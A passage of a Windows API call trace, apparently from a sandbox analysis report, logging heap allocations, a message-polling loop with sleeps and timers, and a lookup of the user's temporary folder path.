wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.672] timeGetTime () returned 0x4f841 [0318.672] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.672] Sleep (dwMilliseconds=0xa) [0318.680] timeGetTime () returned 0x4f851 [0318.680] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.680] Sleep (dwMilliseconds=0xa) [0318.693] timeGetTime () returned 0x4f861 [0318.693] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.693] Sleep (dwMilliseconds=0xa) [0318.709] timeGetTime () returned 0x4f870 [0318.709] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.709] Sleep (dwMilliseconds=0xa) [0318.724] timeGetTime () returned 0x4f880 [0318.724] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.724] Sleep (dwMilliseconds=0xa) [0318.740] timeGetTime () returned 0x4f88f [0318.740] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.740] Sleep (dwMilliseconds=0xa) [0318.755] timeGetTime () returned 0x4f89f [0318.755] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.755] Sleep (dwMilliseconds=0xa) [0318.771] timeGetTime () returned 0x4f8af [0318.771] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.771] Sleep (dwMilliseconds=0xa) [0318.786] timeGetTime () returned 0x4f8be [0318.786] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.786] Sleep (dwMilliseconds=0xa) [0318.802] timeGetTime () returned 0x4f8ce [0318.802] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.802] Sleep (dwMilliseconds=0xa) [0318.826] timeGetTime () returned 0x4f8dd [0318.826] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.826] Sleep (dwMilliseconds=0xa) [0318.833] timeGetTime () returned 0x4f8ed [0318.833] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.833] Sleep (dwMilliseconds=0xa) [0318.849] timeGetTime () returned 0x4f8fd [0318.849] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.849] Sleep (dwMilliseconds=0xa) [0318.864] timeGetTime () returned 0x4f90c [0318.864] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.865] Sleep (dwMilliseconds=0xa) [0318.880] timeGetTime () returned 0x4f91c [0318.880] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.880] Sleep (dwMilliseconds=0xa) [0318.896] timeGetTime () returned 0x4f92b [0318.896] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.896] Sleep (dwMilliseconds=0xa) [0318.911] timeGetTime () returned 0x4f93b [0318.911] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.911] Sleep (dwMilliseconds=0xa) [0318.927] timeGetTime () returned 0x4f94b [0318.927] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.927] Sleep (dwMilliseconds=0xa) [0318.942] timeGetTime () returned 0x4f95a [0318.942] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.942] Sleep (dwMilliseconds=0xa) [0318.963] timeGetTime () returned 0x4f96a [0318.963] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.963] Sleep (dwMilliseconds=0xa) [0318.974] timeGetTime () returned 0x4f979 [0318.974] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.974] Sleep (dwMilliseconds=0xa) [0318.989] timeGetTime () returned 0x4f989 [0318.989] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.989] Sleep (dwMilliseconds=0xa) [0319.006] timeGetTime () returned 0x4f999 [0319.006] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.006] Sleep (dwMilliseconds=0xa) [0319.020] timeGetTime () returned 0x4f9a8 [0319.020] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.020] Sleep (dwMilliseconds=0xa) [0319.036] timeGetTime () returned 0x4f9b8 [0319.036] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.036] Sleep (dwMilliseconds=0xa) [0319.052] timeGetTime () returned 0x4f9c7 [0319.052] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.052] Sleep (dwMilliseconds=0xa) [0319.074] timeGetTime () returned 0x4f9d7 [0319.074] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.074] Sleep (dwMilliseconds=0xa) [0319.083] timeGetTime () returned 0x4f9e7 [0319.083] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.083] Sleep (dwMilliseconds=0xa) [0319.098] timeGetTime () returned 0x4f9f6 [0319.098] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.098] Sleep (dwMilliseconds=0xa) [0319.114] timeGetTime () returned 0x4fa06 [0319.114] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.114] Sleep (dwMilliseconds=0xa) [0319.129] timeGetTime () returned 0x4fa15 [0319.130] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.130] Sleep (dwMilliseconds=0xa) [0319.145] timeGetTime () returned 0x4fa25 [0319.145] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.145] Sleep (dwMilliseconds=0xa) [0319.161] timeGetTime () returned 0x4fa35 [0319.161] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.161] Sleep (dwMilliseconds=0xa) [0319.176] timeGetTime () returned 0x4fa44 [0319.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.176] Sleep (dwMilliseconds=0xa) [0319.192] timeGetTime () returned 0x4fa54 [0319.192] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0319.192] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0319.192] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0319.192] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0319.192] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0319.192] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.192] Sleep (dwMilliseconds=0xa) [0319.208] timeGetTime () returned 0x4fa63 [0319.208] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.208] Sleep (dwMilliseconds=0xa) [0319.223] timeGetTime () returned 0x4fa73 [0319.223] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.223] Sleep (dwMilliseconds=0xa) [0319.239] timeGetTime () returned 0x4fa83 [0319.239] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.239] Sleep (dwMilliseconds=0xa) [0319.254] timeGetTime () returned 0x4fa92 [0319.255] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.255] Sleep (dwMilliseconds=0xa) [0319.270] timeGetTime () returned 0x4faa2 [0319.270] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.270] Sleep (dwMilliseconds=0xa) [0319.285] timeGetTime () returned 0x4fab1 [0319.286] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.286] Sleep (dwMilliseconds=0xa) [0319.301] timeGetTime () returned 0x4fac1 [0319.301] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.301] Sleep (dwMilliseconds=0xa) [0319.317] timeGetTime () returned 0x4fad1 [0319.317] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.317] Sleep (dwMilliseconds=0xa) [0319.334] timeGetTime () returned 0x4fae0 [0319.335] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.335] Sleep (dwMilliseconds=0xa) [0319.348] timeGetTime () returned 0x4faf0 [0319.348] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.348] Sleep (dwMilliseconds=0xa) [0319.364] timeGetTime () returned 0x4faff [0319.364] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.364] Sleep (dwMilliseconds=0xa) [0319.379] timeGetTime () returned 0x4fb0f [0319.379] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.379] Sleep (dwMilliseconds=0xa) [0319.395] timeGetTime () returned 0x4fb1f [0319.395] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.395] Sleep (dwMilliseconds=0xa) [0319.410] timeGetTime () returned 0x4fb2e [0319.410] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.410] Sleep (dwMilliseconds=0xa) [0319.426] timeGetTime () returned 0x4fb3e [0319.426] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.426] Sleep (dwMilliseconds=0xa) [0319.442] timeGetTime () returned 0x4fb4d [0319.442] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.442] Sleep (dwMilliseconds=0xa) [0319.457] timeGetTime () returned 0x4fb5d [0319.457] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.457] Sleep (dwMilliseconds=0xa) [0319.473] timeGetTime () returned 0x4fb6d [0319.473] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.473] Sleep (dwMilliseconds=0xa) [0319.488] timeGetTime () returned 0x4fb7c [0319.488] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.488] Sleep (dwMilliseconds=0xa) [0319.504] timeGetTime () returned 0x4fb8c [0319.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.504] Sleep (dwMilliseconds=0xa) [0319.519] timeGetTime () returned 0x4fb9b [0319.520] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.520] Sleep (dwMilliseconds=0xa) [0319.535] timeGetTime () returned 0x4fbab [0319.535] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.535] Sleep (dwMilliseconds=0xa) [0319.551] timeGetTime () returned 0x4fbbb [0319.551] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.551] Sleep (dwMilliseconds=0xa) [0319.566] timeGetTime () returned 0x4fbca [0319.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.566] Sleep (dwMilliseconds=0xa) [0319.582] timeGetTime () returned 0x4fbda [0319.582] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.582] Sleep (dwMilliseconds=0xa) [0319.597] timeGetTime () returned 0x4fbe9 [0319.598] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.598] Sleep (dwMilliseconds=0xa) [0319.613] timeGetTime () returned 0x4fbf9 [0319.613] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.613] Sleep (dwMilliseconds=0xa) [0319.629] timeGetTime () returned 0x4fc09 [0319.629] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.629] Sleep (dwMilliseconds=0xa) [0319.644] timeGetTime () returned 0x4fc18 [0319.644] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.644] Sleep (dwMilliseconds=0xa) [0319.661] timeGetTime () returned 0x4fc28 [0319.661] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0319.661] Sleep (dwMilliseconds=0xa) [0319.676] timeGetTime () returned 0x4fc37 [0319.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0319.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0319.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0319.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0319.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0319.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0319.677] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0319.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0319.677] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0319.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0319.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0319.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0319.679] HeapFree (in: 